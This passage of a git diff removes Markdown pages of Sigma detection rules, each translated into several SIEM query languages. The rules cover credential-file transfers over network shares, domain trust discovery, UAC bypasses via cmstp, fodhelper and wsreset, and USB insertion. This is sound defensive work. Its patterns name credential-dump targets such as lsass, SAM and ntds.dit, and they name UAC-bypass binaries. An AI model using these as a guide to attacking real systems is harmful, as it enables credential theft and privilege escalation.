-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and ($_.message -match "RelativeTargetName.*.*\\mimidrv.*" -or $_.message -match "RelativeTargetName.*.*\\lsass.*" -or $_.message -match "RelativeTargetName.*.*\\windows\\minidump\\.*" -or $_.message -match "RelativeTargetName.*.*\\hiberfil.*" -or $_.message -match "RelativeTargetName.*.*\\sqldmpr.*" -or $_.message -match "RelativeTargetName.*.*\\sam.*" -or $_.message -match "RelativeTargetName.*.*\\ntds.dit.*" -or $_.message -match "RelativeTargetName.*.*\\security.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND RelativeTargetName.keyword:(*\\mimidrv* OR *\\lsass* OR *\\windows\\minidump\\* OR *\\hiberfil* OR *\\sqldmpr* OR *\\sam* OR *\\ntds.dit* OR *\\security*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/910ab938-668b-401b-b08c-b596e80fdca5 <<EOF
-{
-  "metadata": {
-    "title": "Transfering Files with Credential Data via Network Shares",
-    "description": "Transfering files with well-known filenames (sensitive files with credential data) using network shares",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.001",
-      "attack.t1003.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND RelativeTargetName.keyword:(*\\\\mimidrv* OR *\\\\lsass* OR *\\\\windows\\\\minidump\\\\* OR *\\\\hiberfil* OR *\\\\sqldmpr* OR *\\\\sam* OR *\\\\ntds.dit* OR *\\\\security*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND RelativeTargetName.keyword:(*\\\\mimidrv* OR *\\\\lsass* OR *\\\\windows\\\\minidump\\\\* OR *\\\\hiberfil* OR *\\\\sqldmpr* OR *\\\\sam* OR *\\\\ntds.dit* OR *\\\\security*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Transfering Files with Credential Data via Network Shares'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND RelativeTargetName.keyword:(*\\mimidrv* *\\lsass* *\\windows\\minidump\\* *\\hiberfil* *\\sqldmpr* *\\sam* *\\ntds.dit* *\\security*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" (RelativeTargetName="*\\mimidrv*" OR RelativeTargetName="*\\lsass*" OR RelativeTargetName="*\\windows\\minidump\\*" OR RelativeTargetName="*\\hiberfil*" OR RelativeTargetName="*\\sqldmpr*" OR RelativeTargetName="*\\sam*" OR RelativeTargetName="*\\ntds.dit*" OR RelativeTargetName="*\\security*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" RelativeTargetName IN ["*\\mimidrv*", "*\\lsass*", "*\\windows\\minidump\\*", "*\\hiberfil*", "*\\sqldmpr*", "*\\sam*", "*\\ntds.dit*", "*\\security*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*(?:.*.*\mimidrv.*|.*.*\lsass.*|.*.*\windows\minidump\\.*|.*.*\hiberfil.*|.*.*\sqldmpr.*|.*.*\sam.*|.*.*\ntds\.dit.*|.*.*\security.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_trust_discovery.md b/Atomic_Threat_Coverage/Detection_Rules/win_trust_discovery.md
deleted file mode 100644
index 8b5a449..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_trust_discovery.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Domain Trust Discovery       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1482: Domain Trust Discovery](https://attack.mitre.org/techniques/T1482)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1482: Domain Trust Discovery](../Triggers/T1482.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate use of the utilities by legitimate user for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html](https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Domain Trust Discovery
-id: 3bad990e-4848-4a78-9530-b427d854aac0
-description: Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md
-    - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html
-tags:
-    - attack.discovery
-    - attack.t1482
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: '\nltest.exe'
-        CommandLine|contains: 'domain_trusts'
-      - Image|endswith: '\dsquery.exe'
-        CommandLine|contains: 'trustedDomain'
-    condition: selection
-falsepositives:
-    - Legitimate use of the utilities by legitimate user for legitimate reason
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\nltest.exe" -and $_.message -match "CommandLine.*.*domain_trusts.*") -or ($_.message -match "Image.*.*\\dsquery.exe" -and $_.message -match "CommandLine.*.*trustedDomain.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*) OR (winlog.event_data.Image.keyword:*\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*trustedDomain*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3bad990e-4848-4a78-9530-b427d854aac0 <<EOF
-{
-  "metadata": {
-    "title": "Domain Trust Discovery",
-    "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1482"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*) OR (winlog.event_data.Image.keyword:*\\\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*trustedDomain*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*) OR (winlog.event_data.Image.keyword:*\\\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*trustedDomain*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Domain Trust Discovery'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\nltest.exe AND CommandLine.keyword:*domain_trusts*) OR (Image.keyword:*\\dsquery.exe AND CommandLine.keyword:*trustedDomain*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\nltest.exe" CommandLine="*domain_trusts*") OR (Image="*\\dsquery.exe" CommandLine="*trustedDomain*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\nltest.exe" CommandLine="*domain_trusts*") OR (Image="*\\dsquery.exe" CommandLine="*trustedDomain*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\nltest\.exe)(?=.*.*domain_trusts.*))|.*(?:.*(?=.*.*\dsquery\.exe)(?=.*.*trustedDomain.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_uac_cmstp.md b/Atomic_Threat_Coverage/Detection_Rules/win_uac_cmstp.md
deleted file mode 100644
index 5108fe5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_uac_cmstp.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Bypass UAC via CMSTP       |
-|:-------------------------|:------------------|
-| **Description**          | Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe). |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1191: CMSTP](https://attack.mitre.org/techniques/T1191)</li><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate use of cmstp.exe utility by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html](https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1191/T1191.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1191/T1191.md)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-| Other Tags           | <ul><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Bypass UAC via CMSTP
-id: e66779cc-383e-4224-a3a4-267eeb585c40
-description: Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-modified: 2019/11/11
-date: 2019/10/24
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1191/T1191.md
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1191
-    - attack.t1088
-    - attack.t1548.002
-    - attack.t1218
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\cmstp.exe'
-        CommandLine|contains:
-            - '/s'
-            - '/au'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Legitimate use of cmstp.exe utility by legitimate user
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\cmstp.exe" -and ($_.message -match "CommandLine.*.*/s.*" -or $_.message -match "CommandLine.*.*/au.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\cmstp.exe AND winlog.event_data.CommandLine.keyword:(*\/s* OR *\/au*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e66779cc-383e-4224-a3a4-267eeb585c40 <<EOF
-{
-  "metadata": {
-    "title": "Bypass UAC via CMSTP",
-    "description": "Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1191",
-      "attack.t1088",
-      "attack.t1548.002",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\cmstp.exe AND winlog.event_data.CommandLine.keyword:(*\\/s* OR *\\/au*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\cmstp.exe AND winlog.event_data.CommandLine.keyword:(*\\/s* OR *\\/au*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Bypass UAC via CMSTP'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\cmstp.exe AND CommandLine.keyword:(*\/s* *\/au*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\cmstp.exe" (CommandLine="*/s*" OR CommandLine="*/au*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\cmstp.exe" CommandLine IN ["*/s*", "*/au*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\cmstp\.exe)(?=.*(?:.*.*/s.*|.*.*/au.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_uac_fodhelper.md b/Atomic_Threat_Coverage/Detection_Rules/win_uac_fodhelper.md
deleted file mode 100644
index e98de5b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_uac_fodhelper.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Bypass UAC via Fodhelper.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate use of fodhelper.exe utility by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html](https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1088/T1088.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1088/T1088.md)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community |
-| Other Tags           | <ul><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Bypass UAC via Fodhelper.exe
-id: 7f741dcf-fc22-4759-87b4-9ae8376676a2
-description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1088/T1088.md
-tags:
-    - attack.privilege_escalation
-    - attack.t1088
-    - attack.t1548.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith: '\fodhelper.exe'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Legitimate use of fodhelper.exe utility by legitimate user
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\fodhelper.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.ParentImage.keyword:*\\fodhelper.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7f741dcf-fc22-4759-87b4-9ae8376676a2 <<EOF
-{
-  "metadata": {
-    "title": "Bypass UAC via Fodhelper.exe",
-    "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1088",
-      "attack.t1548.002"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:*\\\\fodhelper.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:*\\\\fodhelper.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Bypass UAC via Fodhelper.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ParentImage.keyword:*\\fodhelper.exe
-```
-
-
-### splunk
-    
-```
-ParentImage="*\\fodhelper.exe" | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\fodhelper.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\fodhelper\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_uac_wsreset.md b/Atomic_Threat_Coverage/Detection_Rules/win_uac_wsreset.md
deleted file mode 100644
index d728224..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_uac_wsreset.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Bypass UAC via WSReset.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies use of WSReset.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html](https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community |
-| Other Tags           | <ul><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Bypass UAC via WSReset.exe
-id: d797268e-28a9-49a7-b9a8-2f5039011c5c
-description: Identifies use of WSReset.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html
-tags:
-    - attack.privilege_escalation
-    - attack.t1088
-    - attack.t1548.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith: '\wsreset.exe'
-    filter:
-        Image|endswith: '\conhost.exe'
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\wsreset.exe" -and  -not ($_.message -match "Image.*.*\\conhost.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\wsreset.exe AND (NOT (winlog.event_data.Image.keyword:*\\conhost.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d797268e-28a9-49a7-b9a8-2f5039011c5c <<EOF
-{
-  "metadata": {
-    "title": "Bypass UAC via WSReset.exe",
-    "description": "Identifies use of WSReset.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1088",
-      "attack.t1548.002"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\wsreset.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\conhost.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\wsreset.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\conhost.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Bypass UAC via WSReset.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\wsreset.exe AND (NOT (Image.keyword:*\\conhost.exe)))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\wsreset.exe" NOT (Image="*\\conhost.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\wsreset.exe"  -(Image="*\\conhost.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\wsreset\.exe)(?=.*(?!.*(?:.*(?=.*.*\conhost\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_usb_device_plugged.md b/Atomic_Threat_Coverage/Detection_Rules/win_usb_device_plugged.md
deleted file mode 100644
index f6df5cd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_usb_device_plugged.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | USB Device Plugged       |
-|:-------------------------|:------------------|
-| **Description**          | Detects plugged USB devices |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1200: Hardware Additions](https://attack.mitre.org/techniques/T1200)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/](https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/)</li><li>[https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/](https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: USB Device Plugged
-id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4
-description: Detects plugged USB devices
-references:
-    - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
-    - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
-status: experimental
-author: Florian Roth
-date: 2017/11/09
-tags:
-    - attack.initial_access
-    - attack.t1200
-logsource:
-    product: windows
-    service: driver-framework
-detection:
-    selection:
-        EventID:
-            - 2003  # Loading drivers
-            - 2100  # Pnp or power management
-            - 2102  # Pnp or power management
-    condition: selection
-falsepositives:
-    - Legitimate administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
